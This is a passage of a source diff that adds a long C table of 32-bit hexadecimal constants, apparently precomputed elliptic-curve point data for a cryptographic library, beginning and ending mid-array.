UINT32_C(0xD40C7FF8), UINT32_C(0xF54CAEB8), UINT32_C(0x16BE6CB2), ++ UINT32_C(0x14CB0A91), UINT32_C(0x14CA471A), UINT32_C(0x02733CAE), ++ UINT32_C(0xD5FF15B8), UINT32_C(0xDAA76580), UINT32_C(0xCAF88D87) } }, ++ { { UINT32_C(0x2C046592), UINT32_C(0x39430E22), UINT32_C(0x1AD26706), ++ UINT32_C(0x6CDAE81F), UINT32_C(0xA25D9106), UINT32_C(0x8C102159), ++ UINT32_C(0x27CA9F30), UINT32_C(0x9A440572), UINT32_C(0x70287FBC), ++ UINT32_C(0x8D34C430), UINT32_C(0x29DB8AFA), UINT32_C(0x9003A455) }, ++ { UINT32_C(0x7FD971AD), UINT32_C(0x91364CC3), UINT32_C(0x9C60EDB7), ++ UINT32_C(0x7B3AA048), UINT32_C(0x526F4DD8), UINT32_C(0x58B0E008), ++ UINT32_C(0xD86D98AE), UINT32_C(0xB7674454), UINT32_C(0xB2B45747), ++ UINT32_C(0xC25F4051), UINT32_C(0xCC043E8F), UINT32_C(0x8243BF9C) } }, ++ { { UINT32_C(0x43A0C387), UINT32_C(0xA89641C6), UINT32_C(0x87B9AB17), ++ UINT32_C(0x6D92205C), UINT32_C(0xDAA0E102), UINT32_C(0x37D691F4), ++ UINT32_C(0xCDE5312E), UINT32_C(0xEB3E52D7), UINT32_C(0x16F518A2), ++ UINT32_C(0x60D3C099), UINT32_C(0x8A378EEB), UINT32_C(0x7854C051) }, ++ { UINT32_C(0x4BBCAAC5), UINT32_C(0x7359DB51), UINT32_C(0x1713F102), ++ UINT32_C(0xF5B1B68C), UINT32_C(0xE4398DE5), UINT32_C(0xDAEAE645), ++ UINT32_C(0xD1ABFB82), UINT32_C(0x8C8ACB6C), UINT32_C(0x136423E2), ++ UINT32_C(0x2E8B76C3), UINT32_C(0xA8BA015E), UINT32_C(0x509DCB2D) } }, ++ { { UINT32_C(0x9AD9C59C), UINT32_C(0x2FF36815), UINT32_C(0x658E65B9), ++ UINT32_C(0xB189A4E8), UINT32_C(0xEA786AD2), UINT32_C(0x7D33DDBB), ++ UINT32_C(0xC0D2DC05), UINT32_C(0x96D0D648), UINT32_C(0xBFA03BE9), ++ UINT32_C(0x05E49256), UINT32_C(0x8BAF5A1C), UINT32_C(0x0EA4E7A6) }, ++ { UINT32_C(0x9F9AD5A8), UINT32_C(0x3DDCE0B0), UINT32_C(0x9E49C2CB), ++ UINT32_C(0xF7809195), UINT32_C(0x21782C2F), UINT32_C(0xBFCEF29D), ++ UINT32_C(0xC41BFD97), UINT32_C(0xE57AD39F), UINT32_C(0x1355AD19), ++ UINT32_C(0xC04B93E8), UINT32_C(0x59440F9F), UINT32_C(0xAABC9E6E) } }, ++ { { UINT32_C(0x5B6459DA), UINT32_C(0x7AA48103), UINT32_C(0x0166E880), ++ UINT32_C(0x83EF7477), UINT32_C(0x511CCE80), UINT32_C(0x536182B1), ++ UINT32_C(0x73CA55AA), UINT32_C(0xAFDD2EEE), UINT32_C(0xA8716143), ++ UINT32_C(0xAB910D0D), UINT32_C(0x83707250), UINT32_C(0x8BEAA42B) }, ++ { UINT32_C(0x8DA2AB3D), UINT32_C(0x4BCCFD89), UINT32_C(0xEC6AA105), ++ UINT32_C(0x1DBF68A9), UINT32_C(0x68EB42DA), UINT32_C(0x32CE6108), ++ UINT32_C(0x8EA62E37), UINT32_C(0x5C2C2C85), UINT32_C(0xCD3088A7), ++ UINT32_C(0x1ED2791F), UINT32_C(0xFF05070C), UINT32_C(0x496B4FEB) } }, ++ { { UINT32_C(0x0AA629C5), UINT32_C(0x9FA9121A), UINT32_C(0x57558BEC), ++ UINT32_C(0xE286CFF1), UINT32_C(0x59813A4D), UINT32_C(0x4D9D657E), ++ UINT32_C(0x26103519), UINT32_C(0xC4676A16), UINT32_C(0x2BD4DF80), ++ UINT32_C(0x616160B3), UINT32_C(0x30FBAE87), UINT32_C(0x26FB78CC) }, ++ { UINT32_C(0x8F0F66BD), UINT32_C(0x09607013), UINT32_C(0x03D9B90D), ++ UINT32_C(0xDD4E2D0C), UINT32_C(0x600D1B12), UINT32_C(0x5D3A8912), ++ UINT32_C(0x4308E126), UINT32_C(0xF76DD52F), UINT32_C(0x9E4FCCA6), ++ UINT32_C(0x97CC0409), UINT32_C(0x04C4DF7B), UINT32_C(0x0CFBE311) } }, ++ { { UINT32_C(0x28437A23), UINT32_C(0x6CA62C12), UINT32_C(0x40E7A003), ++ UINT32_C(0x0DAF3353), UINT32_C(0xD20F8079), UINT32_C(0x1FD07DF0), ++ UINT32_C(0x3BBC9749), UINT32_C(0xEAE7969C), UINT32_C(0x9ECAD022), ++ UINT32_C(0x55861AFA), UINT32_C(0x1FBC3D4C), UINT32_C(0xEC41DAD9) }, ++ { UINT32_C(0xDA8B261B), UINT32_C(0x1FE4CB40), UINT32_C(0x427C5C9D), ++ UINT32_C(0xC2671AB6), UINT32_C(0x261D4939), UINT32_C(0xDFCDA7B8), ++ UINT32_C(0x2072C0B9), UINT32_C(0x9E7B802B), UINT32_C(0xC7828CC2), ++ UINT32_C(0x3AFEE900), UINT32_C(0xF6DE987F), UINT32_C(0x3488BF28) } }, ++ { { UINT32_C(0x7BE1F89E), UINT32_C(0x33B9F2DE), UINT32_C(0x299B15C9), ++ UINT32_C(0xD4E80821), UINT32_C(0x0E13F37F), UINT32_C(0x87A3067A), ++ UINT32_C(0x55FD239F), UINT32_C(0x6D4C09ED), UINT32_C(0x92EF014F), ++ UINT32_C(0x48B1042D), UINT32_C(0xB385A759), UINT32_C(0xA382B2E0) }, ++ { UINT32_C(0x7F6F84F8), UINT32_C(0xBF571BB0), UINT32_C(0x0CE87F50), ++ UINT32_C(0x25AFFA37), UINT32_C(0xFE54F1BC), UINT32_C(0x826906D3), ++ UINT32_C(0xC53AE76A), UINT32_C(0x6B0421F4), UINT32_C(0x4855EB3C), ++ UINT32_C(0x44F85A3A), UINT32_C(0x8D1F2B27), UINT32_C(0xF49E2151) } }, ++ }, ++ { ++ { { UINT32_C(0x5E3C647B), UINT32_C(0xC0426B77), UINT32_C(0x8CF05348), ++ UINT32_C(0xBFCBD939), UINT32_C(0x172C0D3D), UINT32_C(0x31D312E3), ++ UINT32_C(0xEE754737), UINT32_C(0x5F49FDE6), UINT32_C(0x6DA7EE61), ++ UINT32_C(0x895530F0), UINT32_C(0xE8B3A5FB), UINT32_C(0xCF281B0A) }, ++ { UINT32_C(0x41B8A543), UINT32_C(0xFD149735), UINT32_C(0x3080DD30), ++ UINT32_C(0x41A625A7), UINT32_C(0x653908CF), UINT32_C(0xE2BAAE07), ++ UINT32_C(0xBA02A278), UINT32_C(0xC3D01436), UINT32_C(0x7B21B8F8), ++ UINT32_C(0xA0D0222E), UINT32_C(0xD7EC1297), UINT32_C(0xFDC270E9) } }, ++ { { UINT32_C(0x9F101E64), UINT32_C(0x06A67BD2), UINT32_C(0xE1733A4A), ++ UINT32_C(0xCB6E0AC7), UINT32_C(0x97BC62D2), UINT32_C(0xEE0B5D51), ++ UINT32_C(0x24C51874), UINT32_C(0x52B17039), UINT32_C(0x82A1A0D5), ++ UINT32_C(0xFED1F423), UINT32_C(0xDB6270AC), UINT32_C(0x55D90569) }, ++ { UINT32_C(0x5D73D533), UINT32_C(0x36BE4A9C), UINT32_C(0x976ED4D5), ++ UINT32_C(0xBE9266D6), UINT32_C(0xB8F8074B), UINT32_C(0xC17436D3), ++ UINT32_C(0x718545C6), UINT32_C(0x3BB4D399), UINT32_C(0x5C757D21), ++ UINT32_C(0x8E1EA355), UINT32_C(0x8C474366), UINT32_C(0xF7EDBC97) } }, ++ { { UINT32_C(0x6EA83242), UINT32_C(0xEC72C650), UINT32_C(0x1B2D237F), ++ UINT32_C(0xF7DE7BE5), UINT32_C(0x1819EFB0), UINT32_C(0x3C5E2200), ++ UINT32_C(0x8CDDE870), UINT32_C(0xDF5AB6D6), UINT32_C(0x92A87AEE), ++ UINT32_C(0x75A44E9D), UINT32_C(0xBCF77F19), UINT32_C(0xBDDC46F4) }, ++ { UINT32_C(0x669B674D), UINT32_C(0x8191EFBD), UINT32_C(0xED71768F), ++ UINT32_C(0x52884DF9), UINT32_C(0x65CF242C), UINT32_C(0xE62BE582), ++ UINT32_C(0x80B1D17B), UINT32_C(0xAE99A3B1), UINT32_C(0x92DE59A9), ++ UINT32_C(0x48CBB446), UINT32_C(0x2DCB3CE2), UINT32_C(0xD3C226CF) } }, ++ { { UINT32_C(0x9FD94EC4), UINT32_C(0x9580CDFB), UINT32_C(0x28631AD9), ++ UINT32_C(0xED273A6C), UINT32_C(0xC327F3E7), UINT32_C(0x5D3D5F77), ++ UINT32_C(0x35353C5F), UINT32_C(0x05D5339C), UINT32_C(0x5C258EB1), ++ UINT32_C(0xC56FB5FE), UINT32_C(0xEDCE1F79), UINT32_C(0xEFF8425E) }, ++ { UINT32_C(0xCF83CF9C), UINT32_C(0xAB7AA141), UINT32_C(0x207D6D4F), ++ UINT32_C(0xBD2A690A), UINT32_C(0x458D9E52), UINT32_C(0xE1241491), ++ UINT32_C(0xAA7F0F31), UINT32_C(0xDD2448CC), UINT32_C(0xF0FDA7AB), ++ UINT32_C(0xEC58D3C7), UINT32_C(0xC91BBA4D), UINT32_C(0x7B6E122D) } }, ++ { { UINT32_C(0xB1B48156), UINT32_C(0x2A2DEDAF), UINT32_C(0xBB93DB87), ++ UINT32_C(0xA0A2C63A), UINT32_C(0x08ACD99E), UINT32_C(0xC6559078), ++ UINT32_C(0xFE4AC331), UINT32_C(0x03EA42AF), UINT32_C(0xEB180ED6), ++ UINT32_C(0x43D2C14A), UINT32_C(0xB1156A1A), UINT32_C(0xC2F293DD) }, ++ { UINT32_C(0xA9D81249), UINT32_C(0x1FAFABF5), UINT32_C(0x9A8EEE87), ++ UINT32_C(0x39ADDEAD), UINT32_C(0x119E2E92), UINT32_C(0x21E206F2), ++ UINT32_C(0xD74DCEB6), UINT32_C(0xBC5DCC2E), UINT32_C(0x0A73A358), ++ UINT32_C(0x86647FA3), UINT32_C(0x2F53F642), UINT32_C(0xEAD8BEA4) } }, ++ { { UINT32_C(0x91C09091), UINT32_C(0x636225F5), UINT32_C(0x71BDCFDF), ++ UINT32_C(0xCCF5070A), UINT32_C(0xB9668EE2), UINT32_C(0x0EF8D625), ++ UINT32_C(0xB5E04E4F), UINT32_C(0x57BDF6CD), UINT32_C(0x7C75EA43), ++ UINT32_C(0xFC6AB0A6), UINT32_C(0xF7FD6EF3), UINT32_C(0xEB6B8AFB) }, ++ { UINT32_C(0x2A3DF404), UINT32_C(0x5B2AEEF0), UINT32_C(0xB9823197), ++ UINT32_C(0x31FD3B48), UINT32_C(0x83A7EB23), UINT32_C(0x56226DB6), ++ UINT32_C(0x5BB1ED2F), UINT32_C(0x3772C21E), UINT32_C(0xCD1ABA6A), ++ UINT32_C(0x3E833624), UINT32_C(0xAC672DAD), UINT32_C(0xBAE58FFA) } }, ++ { { UINT32_C(0x31BA1705), UINT32_C(0xCE92224D), UINT32_C(0xF0197F63), ++ UINT32_C(0x022C6ED2), UINT32_C(0xA4DC1113), UINT32_C(0x21F18D99), ++ UINT32_C(0x03616BF1), UINT32_C(0x5CD04DE8), UINT32_C(0x9FF12E08), ++ UINT32_C(0x6F900679), UINT32_C(0x48E61DDF), UINT32_C(0xF59A3315) }, ++ { UINT32_C(0xB51BD024), UINT32_C(0x9474D42C), UINT32_C(0x9051E49D), ++ UINT32_C(0x11A0A413), UINT32_C(0xDCE70EDB), UINT32_C(0x79C92705), ++ UINT32_C(0x34198426), UINT32_C(0x113CE278), UINT32_C(0xEA8616D2), ++ UINT32_C(0x8978396F), UINT32_C(0xEA894C36), UINT32_C(0x9A2A14D0) } }, ++ { { UINT32_C(0x604F6E4A), UINT32_C(0x4F1E1254), UINT32_C(0x0187D585), ++ UINT32_C(0x4513B088), UINT32_C(0x19E0F482), UINT32_C(0x9022F257), ++ UINT32_C(0xE2239DBF), UINT32_C(0x51FB2A80), UINT32_C(0x998ED9D5), ++ UINT32_C(0x49940D9E), UINT32_C(0x6C932C5D), UINT32_C(0x0583D241) }, ++ { UINT32_C(0xF25B73F7), UINT32_C(0x1188CEC8), UINT32_C(0x3B3D06CD), ++ UINT32_C(0xA28788CB), UINT32_C(0xA083DB5A), UINT32_C(0xDEA194EC), ++ UINT32_C(0x22DF4272), UINT32_C(0xD93A4F7E), UINT32_C(0x6A009C49), ++ UINT32_C(0x8D84E4BF), UINT32_C(0x3E3E4A9E), UINT32_C(0x893D8DD9) } }, ++ { { UINT32_C(0x33D31160), UINT32_C(0x35E909EA), UINT32_C(0x57172F1E), ++ UINT32_C(0x50203168), UINT32_C(0x51F3D866), UINT32_C(0x2707FC44), ++ UINT32_C(0xD2442A5D), UINT32_C(0xEB9D2018), UINT32_C(0x5DBFE378), ++ UINT32_C(0x904D7209), UINT32_C(0x5F13CF77), UINT32_C(0x6DB132A3) }, ++ { UINT32_C(0x7A3AF54B), UINT32_C(0x9D842BA6), UINT32_C(0x5AA5B4F9), ++ UINT32_C(0x4E16EA19), UINT32_C(0xAF24228E), UINT32_C(0x2BBA457C), ++ UINT32_C(0x16F3C5FE), UINT32_C(0xCC04B3BB), UINT32_C(0x77E64944), ++ UINT32_C(0xBAFAC516), UINT32_C(0xF08BCEE0), UINT32_C(0x31580A34) } }, ++ { { UINT32_C(0x20C30ACA), UINT32_C(0xC6808DEE), UINT32_C(0xA3EA2056), ++ UINT32_C(0xDADD216F), UINT32_C(0x7A4A9F9D), UINT32_C(0xD331394E), ++ UINT32_C(0x424C4026), UINT32_C(0x9E0441AD), UINT32_C(0x0AEB5350), ++ UINT32_C(0xAEED102F), UINT32_C(0xD45B09DA), UINT32_C(0xC6697FBB) }, ++ { UINT32_C(0xDEAC1496), UINT32_C(0x52A2590E), UINT32_C(0x250B87AF), ++ UINT32_C(0x7142B831), UINT32_C(0x6D0784A8), UINT32_C(0xBEF2E68B), ++ UINT32_C(0xA5F71CEF), UINT32_C(0x5F62593A), UINT32_C(0xB5DA51A3), ++ UINT32_C(0x3B8F7616), UINT32_C(0xB680F5FE), UINT32_C(0xC7A6FA0D) } }, ++ { { UINT32_C(0x99C8227C), UINT32_C(0x36C21DE6), UINT32_C(0xC26813B1), ++ UINT32_C(0xBEE3E867), UINT32_C(0xBDD91549), UINT32_C(0x9B05F2E6), ++ UINT32_C(0xA7D1110F), UINT32_C(0x34FF2B1F), UINT32_C(0x37F67FD0), ++ UINT32_C(0x8E6953B9), UINT32_C(0xC3183E20), UINT32_C(0x56C7F18B) }, ++ { UINT32_C(0x9E2019ED), UINT32_C(0x48AF46DE), UINT32_C(0xF551BBBF), ++ UINT32_C(0xDEAF972E), UINT32_C(0xCC5E3EEF), UINT32_C(0x88EE38F8), ++ UINT32_C(0x392D6BAF), UINT32_C(0xFB8D7A44), UINT32_C(0x0127187D), ++ UINT32_C(0x32293BFC), UINT32_C(0xE58647CC), UINT32_C(0x7689E767) } }, ++ { { UINT32_C(0x52168013), UINT32_C(0x00CE901B), UINT32_C(0x837AAE71), ++ UINT32_C(0xC6BF8E38), UINT32_C(0x167677D8), UINT32_C(0xD6F11EFA), ++ UINT32_C(0x86C8E5CF), UINT32_C(0xE53BB485), UINT32_C(0xC48E74AB), ++ UINT32_C(0x671167CE), UINT32_C(0x8AD720A7), UINT32_C(0x8A40218C) }, ++ { UINT32_C(0xE7C1191A), UINT32_C(0x81E827A6), UINT32_C(0xADDB153D), ++ UINT32_C(0x54058F8D), UINT32_C(0x0D950FA2), UINT32_C(0x0BAF2925), ++ UINT32_C(0x576DDA13), UINT32_C(0xC244674D), UINT32_C(0x41BCD13B), ++ UINT32_C(0x8C4630AE), UINT32_C(0x5A077419), UINT32_C(0x6C2127BF) } }, ++ { { UINT32_C(0xA83C501F), UINT32_C(0xCF977FD5), UINT32_C(0xB6AB176F), ++ UINT32_C(0xD7C6DF36), UINT32_C(0x397BC6B5), UINT32_C(0x117F6331), ++ UINT32_C(0xF7A2D491), UINT32_C(0x72A6078B), UINT32_C(0x5242FE2E), ++ UINT32_C(0xE5A2AAED), UINT32_C(0xFEBDC212), UINT32_C(0x88ECFFDC) }, ++ { UINT32_C(0xCE33BA21), UINT32_C(0xF2DBBF50), UINT32_C(0xCEB19F07), ++ UINT32_C(0xE1343B76), UINT32_C(0xD2C28F71), UINT32_C(0x1F32D4C9), ++ UINT32_C(0x18587685), UINT32_C(0x93FC64B4), UINT32_C(0xBA1F8BD1), ++ UINT32_C(0x39CEEF9B), UINT32_C(0x8D6D6BB0), UINT32_C(0x99C36A78) } }, ++ { { UINT32_C(0x3E9561CF), UINT32_C(0x0D063817), UINT32_C(0x3D33704D), ++ UINT32_C(0x1D8646AA), UINT32_C(0x7A08BA33), UINT32_C(0x8C451384), ++ UINT32_C(0xE02D6624), UINT32_C(0x96446BD3), UINT32_C(0x2D6F4166), ++ UINT32_C(0x749849F0), UINT32_C(0x14268BF0), UINT32_C(0xE364DA01) }, ++ { UINT32_C(0x9AEBFCFD), UINT32_C(0x7CE4587E), UINT32_C(0x56234393), ++ UINT32_C(0xD4686064), UINT32_C(0x16DF73B2), UINT32_C(0x00231D51), ++ UINT32_C(0x7279C78C), UINT32_C(0xF6A969B7), UINT32_C(0x6CB4117C), ++ UINT32_C(0x1FF1F6B6), UINT32_C(0xD3EAB680), UINT32_C(0x30AEBC39) } }, ++ { { UINT32_C(0x93EF00B9), UINT32_C(0x5CC97E64), UINT32_C(0x972345AE), ++ UINT32_C(0xDAE13841), UINT32_C(0x4788F43C), UINT32_C(0x85839184), ++ UINT32_C(0xE2E6CF3E), UINT32_C(0xD0FF521E), UINT32_C(0x4B707C86), ++ UINT32_C(0xAED14A5B), UINT32_C(0xD2523CF7), UINT32_C(0x7EAAE4A6) }, ++ { UINT32_C(0x024C8AC6), UINT32_C(0x266472C5), UINT32_C(0xC0170051), ++ UINT32_C(0xE47E1522), UINT32_C(0x73826BAE), UINT32_C(0x7B83DA61), ++ UINT32_C(0xCF543F0D), UINT32_C(0xE97E19F5), UINT32_C(0x20BF38E2), ++ UINT32_C(0x5D5248FA), UINT32_C(0xDF56A037), UINT32_C(0x8A7C2F7D) } }, ++ { { UINT32_C(0x87B0526C), UINT32_C(0xB04659DD), UINT32_C(0x2307565E), ++ UINT32_C(0x593C604A), UINT32_C(0x7C630AB8), UINT32_C(0x49E52225), ++ UINT32_C(0xDCE9CD23), UINT32_C(0x24C1D0C6), UINT32_C(0x85177079), ++ UINT32_C(0x6FDB241C), UINT32_C(0xF250C351), UINT32_C(0x5F521D19) }, ++ { UINT32_C(0xA6FB61DF), UINT32_C(0xFB56134B), UINT32_C(0xD75C07ED), ++ UINT32_C(0xA4E70D69), UINT32_C(0x7D8825A8), UINT32_C(0xB7A82448), ++ UINT32_C(0xDD64BBCC), UINT32_C(0xA3AEA7D4), UINT32_C(0x8692F539), ++ UINT32_C(0xD53E6E6C), UINT32_C(0xF7AA4BC0), UINT32_C(0x8DDDA83B) } }, ++ }, ++ { ++ { { UINT32_C(0xDD93D50A), UINT32_C(0x140A0F9F), UINT32_C(0x83B7ABAC), ++ UINT32_C(0x4799FFDE), UINT32_C(0x04A1F742), UINT32_C(0x78FF7C23), ++ UINT32_C(0x195BA34E), UINT32_C(0xC0568F51), UINT32_C(0x3B7F78B4), ++ UINT32_C(0xE9718360), UINT32_C(0xF9EFAA53), UINT32_C(0x9CFD1FF1) }, ++ { UINT32_C(0xBB06022E), UINT32_C(0xE924D2C5), UINT32_C(0xFAA2AF6D), ++ UINT32_C(0x9987FA86), UINT32_C(0x6EE37E0F), UINT32_C(0x4B12E73F), ++ UINT32_C(0x5E5A1DDE), UINT32_C(0x1836FDFA), UINT32_C(0x9DCD6416), ++ UINT32_C(0x7F1B9225), UINT32_C(0x677544D8), UINT32_C(0xCB2C1B4D) } }, ++ { { UINT32_C(0x9C213D95), UINT32_C(0x0254486D), UINT32_C(0xCB2F6E94), ++ UINT32_C(0x68A9DB56), UINT32_C(0x000F5491), UINT32_C(0xFB5858BA), ++ UINT32_C(0x34009FB6), UINT32_C(0x1315BDD9), UINT32_C(0xC42BDE30), ++ UINT32_C(0xB18A8E0A), UINT32_C(0xF1070358), UINT32_C(0xFDCF93D1) }, ++ { UINT32_C(0x3022937E), UINT32_C(0xBEB1DB75), UINT32_C(0xCAC20DB4), ++ UINT32_C(0x9B9ECA7A), UINT32_C(0xE4122B20), UINT32_C(0x152214D4), ++ UINT32_C(0xAABCCC7B), UINT32_C(0xD3E673F2), UINT32_C(0xAED07571), ++ UINT32_C(0x94C50F64), UINT32_C(0xE66B4F17), UINT32_C(0xD767059A) } }, ++ { { UINT32_C(0xDCD6D14B), UINT32_C(0x40336B12), UINT32_C(0xE3B4919C), ++ UINT32_C(0xF6BCFF5D), UINT32_C(0x9C841F0C), UINT32_C(0xC337048D), ++ UINT32_C(0x1D617F50), UINT32_C(0x4CE6D025), UINT32_C(0x8117D379), ++ UINT32_C(0x00FEF219), UINT32_C(0xF95BE243), UINT32_C(0x18B7C4E9) }, ++ { UINT32_C(0x38DF08FF), UINT32_C(0x98DE119E), UINT32_C(0x8D772D20), ++ UINT32_C(0xDFD803BD), UINT32_C(0x0F9678BD), UINT32_C(0x94125B72), ++ UINT32_C(0x334ACE30), UINT32_C(0xFC5B57CD), UINT32_C(0xB7E86E04), ++ UINT32_C(0x09486527), UINT32_C(0x6E552039), UINT32_C(0xFE9F8BCC) } }, ++ { { UINT32_C(0xD6F5A10E), UINT32_C(0x3B75C45B), UINT32_C(0xC1C35F38), ++ UINT32_C(0xFD4680F4), UINT32_C(0xF8E0A113), UINT32_C(0x5450227D), ++ UINT32_C(0x73DDBA24), UINT32_C(0x5E69F1AE), UINT32_C(0x57F24645), ++ UINT32_C(0x2007B80E), UINT32_C(0x3D159741), UINT32_C(0xC63695DC) }, ++ { UINT32_C(0x4530F623), UINT32_C(0xCBE54D29), UINT32_C(0x2869586B), ++ UINT32_C(0x986AD573), UINT32_C(0x4CC39F73), UINT32_C(0xE19F7059), ++ UINT32_C(0x2B1B8DA9), UINT32_C(0x80F00AB3), UINT32_C(0x73F68D26), ++ UINT32_C(0xB765AAF9), UINT32_C(0xE993F829), UINT32_C(0xBC79A394) } }, ++ { { UINT32_C(0xF310D2A0), UINT32_C(0x9C441043), UINT32_C(0xDC5EB106), ++ UINT32_C(0x2865EE58), UINT32_C(0x9CB8065C), UINT32_C(0x71A95922), ++ UINT32_C(0xA052AF0F), UINT32_C(0x8EB3A733), UINT32_C(0xB09D716E), ++ UINT32_C(0x56009F42), UINT32_C(0xABCBE6AD), UINT32_C(0xA7F923C5) }, ++ { UINT32_C(0xFA375C01), UINT32_C(0x263B7669), UINT32_C(0x21EF27A2), ++ UINT32_C(0x641C47E5), UINT32_C(0xB08FFD25), UINT32_C(0xA89B474E), ++ UINT32_C(0xF0A239F3), UINT32_C(0x5BE8EC3F), UINT32_C(0x242A6C5A), ++ UINT32_C(0x0E79957A), UINT32_C(0x0C6C75F5), UINT32_C(0x1DFB26D0) } }, ++ { { UINT32_C(0x9DFBF22A), UINT32_C(0x2FD97B9B), UINT32_C(0x5643532D), ++ UINT32_C(0xDEC16CC8), UINT32_C(0x60FEE7C3), UINT32_C(0xDF0E6E39), ++ UINT32_C(0x545860C8), UINT32_C(0xD09AD7B6), UINT32_C(0x73FC3B7C), ++ UINT32_C(0xCC16E984), UINT32_C(0x0D4E1555), UINT32_C(0x6CE734C1) }, ++ { UINT32_C(0x4B5F6032), UINT32_C(0xC6EFE68B), UINT32_C(0x14F54073), ++ UINT32_C(0x3A64F34C), UINT32_C(0xAC44DC95), UINT32_C(0x25DA689C), ++ UINT32_C(0x5358AD8A), UINT32_C(0x990C477E), UINT32_C(0xF36DA7DE), ++ UINT32_C(0x00E958A5), UINT32_C(0xC9B6F161), UINT32_C(0x902B7360) } }, ++ { { UINT32_C(0x9347B90A), UINT32_C(0x454AB42C), UINT32_C(0xA698B02B), ++ UINT32_C(0xCAEBE64A), UINT32_C(0xFB86FA40), UINT32_C(0x119CDC69), ++ UINT32_C(0xC3109281), UINT32_C(0x2E5CB7AD), UINT32_C(0xCD0C3D00), ++ UINT32_C(0x67BB1EC5), UINT32_C(0x83F25BBF), UINT32_C(0x5D430BC7) }, ++ { UINT32_C(0x5CDE0ABB), UINT32_C(0x69FD84A8), UINT32_C(0x9816B688), ++ UINT32_C(0x69DA263E), UINT32_C(0x0E53CBB8), UINT32_C(0xE52D93DF), ++ UINT32_C(0xADD2D5A7), UINT32_C(0x42CF6F25), UINT32_C(0xC87CA88F), ++ UINT32_C(0x227BA59D), UINT32_C(0xDA738554), UINT32_C(0x7A1CA876) } }, ++ { { UINT32_C(0x1CAC82C4), UINT32_C(0x3FA5C105), UINT32_C(0x8A78C9BE), ++ UINT32_C(0x23C76087), UINT32_C(0x1C5CFA42), UINT32_C(0xE98CDAD6), ++ UINT32_C(0x0A6C0421), UINT32_C(0x09C30252), UINT32_C(0x42FC61B9), ++ UINT32_C(0x149BAC7C), UINT32_C(0x3004A3E2), UINT32_C(0x3A1C22AC) }, ++ { UINT32_C(0x202C7FED), UINT32_C(0xDE6B0D6E), UINT32_C(0xE7E63052), ++ UINT32_C(0xB2457377), UINT32_C(0x3706B3EF), UINT32_C(0x31725FD4), ++ UINT32_C(0x2B1AFDBF), UINT32_C(0xE16A347D), UINT32_C(0x8C29CF66), ++ UINT32_C(0xBE4850C4), UINT32_C(0x2939F23C), UINT32_C(0x8F51CC4D) } }, ++ { { UINT32_C(0x219AE6C1), UINT32_C(0x169E025B), UINT32_C(0x116E1CA1), ++ UINT32_C(0x55FF526F), UINT32_C(0xB191F55D), UINT32_C(0x01B810A3), ++ UINT32_C(0x29588A69), UINT32_C(0x2D981272), UINT32_C(0x48B92199), ++ UINT32_C(0x53C93770), UINT32_C(0x8A85236F), UINT32_C(0x8C7DD84E) }, ++ { UINT32_C(0xCAACF958), UINT32_C(0x293D48B6), UINT32_C(0x43572B30), ++ UINT32_C(0x1F084ACB), UINT32_C(0xFAD91F28), UINT32_C(0x628BFA2D), ++ UINT32_C(0x829386AF), UINT32_C(0x8D627B11), UINT32_C(0xD44A77BE), ++ UINT32_C(0x3EC1DD00), UINT32_C(0x649AC7F0), UINT32_C(0x8D3B0D08) } }, ++ { { UINT32_C(0x177513BF), UINT32_C(0x00A93DAA), UINT32_C(0x42AD79E1), ++ UINT32_C(0x2EF0B96F), UINT32_C(0xA07129D9), UINT32_C(0x81F5AAF1), ++ UINT32_C(0x923F2449), UINT32_C(0xFC04B7EF), UINT32_C(0x60CDB1B7), ++ UINT32_C(0x855DA795), UINT32_C(0xAD5D61D4), UINT32_C(0xB1EB5DAB) }, ++ { UINT32_C(0x353FD028), UINT32_C(0xD2CEF1AE), UINT32_C(0x9EE94847), ++ UINT32_C(0xC21D5439), UINT32_C(0x0380C1A8), UINT32_C(0x9ED552BB), ++ UINT32_C(0x2BAC328F), UINT32_C(0xB156FE7A), UINT32_C(0x7213C6A4), ++ UINT32_C(0xBB7E0196), UINT32_C(0x1701ED5B), UINT32_C(0x36002A33) } }, ++ { { UINT32_C(0xDDC9EF4D), UINT32_C(0x20B1632A), UINT32_C(0x272D082B), ++ UINT32_C(0x2A35FF4C), UINT32_C(0xF6CC9BD3), UINT32_C(0x30D39923), ++ UINT32_C(0xE65C9D08), UINT32_C(0x6D879BC2), UINT32_C(0x6FA9983C), ++ UINT32_C(0xCE8274E1), UINT32_C(0x0EB7424F), UINT32_C(0x652371E8) }, ++ { UINT32_C(0xC5C35282), UINT32_C(0x32B77503), UINT32_C(0xC885A931), ++ UINT32_C(0xD7306333), UINT32_C(0x72955AA8), UINT32_C(0x8A16D719), ++ UINT32_C(0x7D51F882), UINT32_C(0x5548F163), UINT32_C(0xBABA59EF), ++ UINT32_C(0xB311DC66), UINT32_C(0x0DB8F627), UINT32_C(0x773D5448) } }, ++ { { UINT32_C(0x7A62EB3B), UINT32_C(0x59B1B134), UINT32_C(0xCCEEFB34), ++ UINT32_C(0x0F8CE157), UINT32_C(0xA798CB2B), UINT32_C(0x3FE842A8), ++ UINT32_C(0x0BF4161D), UINT32_C(0xD01BC626), UINT32_C(0x4D016FDB), ++ UINT32_C(0x55EF6E55), UINT32_C(0xB242B201), UINT32_C(0xCB561503) }, ++ { UINT32_C(0xAF4199C1), UINT32_C(0x076EBC73), UINT32_C(0x697244F7), ++ UINT32_C(0x39DEDCBB), UINT32_C(0x040162BC), UINT32_C(0x9D184733), ++ UINT32_C(0x7F6B5FA6), UINT32_C(0x902992C1), UINT32_C(0xBB4952B5), ++ UINT32_C(0xAD1DE754), UINT32_C(0xA121F6C8), UINT32_C(0x7ACF1B93) } }, ++ { { UINT32_C(0x325C9B9A), UINT32_C(0x7A56867C), UINT32_C(0xF3DC3D6A), ++ UINT32_C(0x1A143999), UINT32_C(0x03F5BCB8), UINT32_C(0xCE109590), ++ UINT32_C(0xD6EEE5B7), UINT32_C(0x034E9035), UINT32_C(0x495DF1BC), ++ UINT32_C(0x2AFA81C8), UINT32_C(0x08924D02), UINT32_C(0x5EAB52DC) }, ++ { UINT32_C(0xAA181904), UINT32_C(0xEE6AA014), UINT32_C(0x310AD621), ++ UINT32_C(0xE62DEF09), UINT32_C(0xC7538A03), UINT32_C(0x6C9792FC), ++ UINT32_C(0x3E41D789), UINT32_C(0xA89D3E88), UINT32_C(0x9F94AE83), ++ UINT32_C(0xD60FA11C), UINT32_C(0xE0D6234A), UINT32_C(0x5E16A8C2) } }, ++ { { UINT32_C(0xA9242F3B), UINT32_C(0x87EC053D), UINT32_C(0xF0E03545), ++ UINT32_C(0x99544637), UINT32_C(0x6B7019E9), 